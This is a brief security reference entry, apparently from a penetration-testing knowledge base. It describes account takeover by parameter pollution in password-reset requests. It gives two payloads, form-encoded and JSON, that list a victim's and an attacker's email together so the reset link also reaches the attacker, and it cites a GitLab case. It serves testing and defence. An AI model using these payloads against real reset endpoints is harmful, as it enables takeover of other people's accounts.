Parameter pollution (password resets)

Account takeover via parameter pollution

Example of parameter pollution to send the victim's password reset link to the attacker's email:

email=victim-user%40syslifters.com&email=attacker-user%40syslifters.com

Or in JSON:

{"email":["victim-user@syslifters.com","attacker-user@syslifters.com"]}

Reference: GitLab account takeover